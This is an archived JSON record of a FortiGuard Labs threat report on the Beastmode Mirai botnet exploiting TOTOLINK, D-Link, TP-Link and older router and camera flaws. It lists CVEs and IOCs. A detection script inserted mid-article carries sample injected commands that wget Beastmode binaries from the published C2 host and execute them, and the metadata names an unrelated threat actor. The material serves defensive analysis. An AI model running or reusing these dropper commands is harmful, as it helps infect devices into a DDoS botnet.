{
	"id": "a8085262-2c68-418b-ad00-b313921421a6",
	"created_at": "2026-04-06T01:29:40.506404Z",
	"updated_at": "2026-04-10T03:23:51.251238Z",
	"deleted_at": null,
	"sha1_hash": "7d423bad0fbc1250deea642f18c2ef804fe940c7",
	"title": "Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 73124,
	"plain_text": "Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign\r\nBy Joie Salvio and Roy Tay\r\nPublished: 2022-04-01 · Archived: 2026-04-06 01:14:01 UTC\r\nBetween February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, three of them targeting various models of TOTOLINK routers.\r\nThe inclusion of TOTOLINK exploits is especially noteworthy because they were added just a week after the exploit code was published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of its release.\r\nBy rapidly adopting newly released exploit code, threat actors can infect vulnerable devices and expand their botnets before patches for these vulnerabilities are applied.\r\nTOTOLINK has already released updated firmware for the affected models, and users are strongly encouraged to update their devices.\r\nThis post details how this threat leverages these vulnerabilities to control affected devices, and ways to protect users from these attacks.\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nExploiting New Vulnerabilities\r\nThe Beastmode campaign derives its name from the filenames and URLs used for its binary samples (Figure 1), as well as a distinctive HTTP User-Agent header, \"b3astmode\" (Figure 2), in its exploit requests. 
The binary samples are based on the publicly available source code of the Mirai botnet.\r\nLike most DDoS botnets, Beastmode employs a variety of exploits, in addition to brute-forcing credentials, to infect more devices. The exploits observed are listed below.\r\nCVE-2022-26210 targets TOTOLINK A800R, A810R, A830R, A950RG, A3000RU, and A3100R (Figure 2).\r\nCVE-2022-25075/25076/25077/25078/25079/25080/25081/25082/25083/25084 are a family of similar vulnerabilities targeting TOTOLINK A810R, A830R, A860R, A950RG, A3100R, A3600R, T6, and T10 routers (Figure 4).\r\nhttps://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign\r\nPage 1 of 5\r\nInterestingly, the samples caught on 20 Feb 2022 contained a typo in the request URL: “downloadFile.cgi” was used instead of the “downloadFlile.cgi” path used by the devices. This had been fixed in samples captured three days later, suggesting active development and operation of this campaign.\r\nApart from TOTOLINK products, this campaign also targets discontinued D-Link products (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L and DIR-836L) via CVE-2021-45382 (Figure 5). Note that updated firmware is not available, as these products have reached the end of their life/support cycles.\r\nThis campaign also attempts to exploit CVE-2021-4045 (Figure 6), a vulnerability in the TP-Link Tapo C200 IP camera, which we have not observed in other Mirai-based campaigns. 
While the current implementation of that exploit is incorrect, device owners should still update their camera firmware to fix the vulnerability.\r\nA couple of older vulnerabilities were also found in the samples analyzed by FortiGuard Labs researchers, namely CVE-2017-17215 (Figure 7), targeting Huawei HG532 routers, and CVE-2016-5674 (Figure 8), targeting NUUO NVRmini2, NVRsolo, Crystal Devices, and NETGEAR ReadyNAS Surveillance products.\r\nAlthough they affect a variety of products, these vulnerabilities are all similar in that they allow threat actors to inject commands that are executed on the device after successful exploitation. The injected command usually invokes wget to download a shell script that infects the device with Beastmode.\r\nEach exploit leads to a slightly different shell script. Snippets of the scripts downloaded after successful exploitation of CVE-2021-45382, CVE-2022-26186, and CVE-2022-25075, respectively, are shown in Figure 9.\r\nAs the figure shows, each script downloads the same file under a different filename and executes it with a different parameter.\r\nFor instance, successful exploitation of CVE-2021-45382, a vulnerability involving a function named “DDNS” within D-Link router firmware, leads to the download and execution (Figure 5) of the shell script “ddns.sh”. As shown in Figure 9, that script then downloads the Beastmode binary, saves it as “ddns”, and executes it with the “ddns.exploit” parameter. The parameter (highlighted in blue) makes the infected device register itself as part of the “ddns.exploit” sub-group within the botnet. 
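The exploit requests and follow-on scripts described above carry a few stable markers: the b3astmode User-Agent, the downloadFlile.cgi / downloadFile.cgi path of the TOTOLINK exploit, a wget fetch of a b3astmode.<arch> binary from the download host, and the sub-group label passed as the first argument when the saved file is run. The Python below is an added example written for this page, not code from the Fortinet post: it scans constructed access-log records for those markers and pulls the download host, fetched filename, saved name and sub-group label out of an injected command or a stage-two script. The pipe-separated log layout, the /cgi-bin/ and /upload.cgi paths, the totolink.sh script name, and the sample records and script are assumptions made here for illustration; the marker strings and the 195.133.18.119 and 136.144.41.69 hosts come from the post.

```python
# Added example for this page, not code from the Fortinet post. It turns the
# Beastmode markers described in the text (the b3astmode User-Agent, the
# downloadFlile.cgi / downloadFile.cgi TOTOLINK paths, wget fetches of the
# b3astmode.<arch> binaries from the published download host, and the sub-group
# label passed when the saved file is run) into a scan over access-log records.
from urllib.parse import unquote

# Marker strings from the post; the hosts are the published download / C2 IOCs.
UA_MARKER = 'b3astmode'
TOTOLINK_PATHS = ('downloadFlile.cgi', 'downloadFile.cgi')
IOC_HOSTS = ('195.133.18.119', '136.144.41.69')

def shell_commands(text):
    # Split an injected payload or a dropper script into simple commands (on
    # newlines, ; and &) and each command into argv. A query key glued to the
    # first word, e.g. cmd=wget, is dropped so the verb is seen. Assumption:
    # the payload uses no shell quoting, which matches the one-liners the post shows.
    cmds = []
    for chunk in ';'.join(text.splitlines()).replace('&', ';').split(';'):
        argv = chunk.split()
        if argv and '=' in argv[0] and not argv[0].startswith('http'):
            argv[0] = argv[0].split('=', 1)[1]
        argv = [a for a in argv if a]
        if argv:
            cmds.append(argv)
    return cmds

def parse_download(text):
    # Describe the wget stage of a command string: the URL and host fetched,
    # the basename of the fetched file, the name it is saved under (-O), and the
    # first argument given when that saved file is executed (the sub-group
    # label, e.g. ddns.exploit). Returns None when there is no wget at all.
    cmds = shell_commands(text)
    fetch = next((c for c in cmds if c[0] == 'wget'), None)
    if fetch is None:
        return None
    url = next((a for a in fetch[1:] if a.startswith('http')), '')
    host = url.split('/')[2].split(':')[0] if url.count('/') >= 2 else ''
    file = url.rsplit('/', 1)[-1]
    saved = fetch[fetch.index('-O') + 1] if '-O' in fetch[:-1] else file
    name = saved.rsplit('/', 1)[-1]
    subgroup = ''
    for argv in cmds:
        # either 'sh /tmp/ddns.sh' or './ddns ddns.exploit' runs the saved file
        if argv[0] in ('sh', 'bash') and len(argv) > 1 and argv[1].rsplit('/', 1)[-1] == name:
            subgroup = argv[2] if len(argv) > 2 else ''
            break
        if argv[0].startswith(('./', '/')) and argv[0].rsplit('/', 1)[-1] == name:
            subgroup = argv[1] if len(argv) > 1 else ''
            break
    return {'url': url, 'host': host, 'file': file, 'saved_as': name, 'subgroup': subgroup}

def parse_record(line):
    # Assumed log layout, constructed for this example: ip|method|target|user_agent
    parts = line.strip().split('|', 3)
    if len(parts) != 4:
        return None
    ip, method, target, ua = parts
    return {'ip': ip, 'method': method, 'target': unquote(target), 'ua': ua}

def classify(rec):
    # List the Beastmode indicators one record matches; an empty list is clean.
    hits = []
    if UA_MARKER in rec['ua'].lower():
        hits.append('ua:' + UA_MARKER)
    if any(p in rec['target'] for p in TOTOLINK_PATHS):
        hits.append('path:totolink-cgi')
    dl = parse_download(rec['target'])
    if dl is not None and dl['host'] in IOC_HOSTS:
        hits.append('ioc-host:' + dl['host'])
    if dl is not None and dl['file'].startswith('b3astmode.'):
        hits.append('beastmode-binary:' + dl['file'])
    return hits

def scan(lines):
    # Return (client ip, hits) for every record that matches at least one marker.
    flagged = []
    for line in lines:
        rec = parse_record(line)
        hits = classify(rec) if rec is not None else []
        if hits:
            flagged.append((rec['ip'], hits))
    return flagged

# Constructed records (not real traffic). The /cgi-bin/ prefix, the /upload.cgi
# path and the totolink.sh script name are placeholders assumed here.
SAMPLE_LOG = [
    '203.0.113.7|POST|/cgi-bin/downloadFile.cgi?payload=;wget%20http://195.133.18.119/beastmode/totolink.sh%20-O%20/tmp/t.sh;sh%20/tmp/t.sh|b3astmode',
    '198.51.100.4|GET|/index.html|Mozilla/5.0',
    '192.0.2.9|GET|/cgi-bin/downloadFlile.cgi?payload=;wget%20http://203.0.113.77/x.sh|Mozilla/5.0',
    '192.0.2.20|POST|/upload.cgi?cmd=wget%20http://195.133.18.119/beastmode/b3astmode.arm7%20-O%20/tmp/x;chmod%20777%20/tmp/x;/tmp/x%20ddns.exploit|Mozilla/5.0',
]
# Constructed stage-two script in the shape the post describes for ddns.sh.
SAMPLE_SCRIPT = 'cd /tmp; wget http://195.133.18.119/beastmode/b3astmode.mips -O ddns; chmod 777 ddns; ./ddns ddns.exploit'

if __name__ == '__main__':
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
    print(parse_download(SAMPLE_SCRIPT))
```

Run it directly to print the flagged records and the parsed script. The third record is flagged on the path marker alone even though its download host is not in the IOC list, which is the point of matching the exploit path and not just the published IPs: the same public exploit code will be picked up by the next operator on a different host.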
Such sub-grouping could then be used by the botnet operators to assess the viability of specific exploits by counting the bots in each group, or simply for ease of management.\r\nOnce devices are infected by Beastmode, the botnet can be used by its operators to perform a variety of DDoS attacks commonly found in other Mirai-based botnets, including:\r\nattack_app_http\r\nattack_tcp_ack\r\nattack_tcp_syn\r\nattack_udp_plain\r\nattack_udp_vse\r\nattack_udp_ovhhex\r\nattack_udp_stdhex\r\nattack_udp_CLAMP\r\nConclusion\r\nEven though the original Mirai authors were sentenced in fall 2018, this article highlights how threat actors, such as those behind the Beastmode campaign, continue to rapidly incorporate newly published exploit code to infect unpatched devices with the Mirai malware.\r\nBy continuously monitoring the evolving threat landscape, FortiGuard Labs researchers identify new vulnerabilities exploited by Mirai variants and other malware targeting IoT devices, to bring greater awareness to such threats and better secure our customers’ networks.\r\nFortinet Protections\r\nFortinet customers are protected by the following:\r\nThe following generic FortiGuard IPS signatures detect exploitation attempts from Beastmode and other Mirai-based botnets:\r\nMirai.Botnet\r\nHTTP.Unix.Shell.IFS.Remote.Code.Execution\r\nFortiGuard Labs also provides IPS signatures against the following vulnerabilities:\r\nCVE-2017-17215 - Huawei.HG532.Remote.Code.Execution\r\nCVE-2016-5674 - NUUO.Surveillance.Application.UNAUTH.Remote.Code.Execution\r\nThe FortiGuard Web Filtering Service blocks the download URLs and identified C2s.\r\nThe FortiGuard AntiVirus service detects and blocks this threat as Linux/Mirai and ELF/Mirai.\r\nFortiGuard IP Reputation \u0026 Anti-Botnet Security Service proactively blocks these attacks by aggregating malicious source IP data from the Fortinet 
distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIOCs\r\nDownload URLs\r\nhttp://195.133.18[.]119/beastmode/b3astmode.86_64\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm4\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm5\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm6\r\nhttp://195.133.18[.]119/beastmode/b3astmode.arm7\r\nhttp://195.133.18[.]119/beastmode/b3astmode.m68k\r\nhttp://195.133.18[.]119/beastmode/b3astmode.mips\r\nhttp://195.133.18[.]119/beastmode/b3astmode.mpsl\r\nhttp://195.133.18[.]119/beastmode/b3astmode.ppc\r\nhttp://195.133.18[.]119/beastmode/b3astmode.sh4\r\nhttp://195.133.18[.]119/beastmode/b3astmode.x86\r\nC2 IPs\r\n195.133.18[.]119\r\n136.144.41[.]69\r\nSamples (SHA256)\r\n04a50c409a30cdd53036c490534ee7859b828f2b9a9dd779c6b0112b88b74708\r\n0ca74024f5b389fcfa5ee545c8a7842316c78fc53d4a9e94c34d556459a58877\r\n0d442f4327ddd254dbb2a9a243d9317313e44d4f6a6078ea1139ddd945c3f272\r\n14726d501dd489e8228af9580b4369819efb3101f6128df1a1ab0fcc8d96e797\r\n18cefe4333f5f1165c1275c956c8ae717d53818b2c5b2372144fb87d6687f0d8\r\n36a85f2704f77d7e11976541f3d77774109461e1baae984beb83064c2e34239a\r\n3d0a119b68044b841128e451d80ee41d8be9cc61f9ff9a01c3db7d3271e15655\r\n5adfd18422a37a40e6c7626b27d425a4c5a6ca45ecbc8becd690b8533d9d6c7c\r\n635569c7612278d730cb87879843de03d1ea0df4e1c70262ab50659780eace3b\r\n676b2aa6839606d49bbd2f29487e4c218e7d14dd1a9b870edcabdd11fcab9cf7\r\n9c88fa218af7fb72188a0262b3a29008fedcf3d434b90e8fa578ac8f250f5025\r\na21aa45045c0d4b0d785891b8be57496d62bc2396d01c24a34b40f3e2227ef07\r\na5cbe89bf1f3121eb2012e3c5bb5c237c613b8b615384be0f1cc92817a2f1efe\r\na6a7e46bd0e9ec67a1adec64af8fddee18ce019f731ee9cbf8341b35b2519dd9\r\nb573f4d58b1fe6309b90611dd1d1030d7a3d1eb8ddb18de6dc58eefa876820fd\r\nbe3248d97653e8f97cb8f69af260f03b19965489478211a5565b786e9f5d3c02\r\nca8980cb3bd286e41950d78555fd070eaf2d3bebf2751cb0d12a3eff0a41f829\r\ncd48523a6dced4054cce051d4dd8c06268cee375e56afbf59d724faa91c3e766\r\nd799ae8a017e76d22f1f35f271ebae9168b7712dce0ce86753edabd6e5f4f0d6\r\nded30dbc39e310ebbc17a9667a14e7f0f2e08999bfc5ebd4eae5c1840b82860a\r\ne7db388460d4e1f8d740018e6012af0ad785d3876a35c924db1f4982d7902db3\r\ne85c3d3ed49d44b1ec3af89d730e129d68a32212e911e6431f405e201597f6ed\r\nSource: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign"
	],
	"report_names": [
		"totolink-vulnerabilities-beastmode-mirai-campaign"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438980,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.pdf",
		"text": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.txt",
		"img": "https://archive.orkl.eu/7d423bad0fbc1250deea642f18c2ef804fe940c7.jpg"
	}
}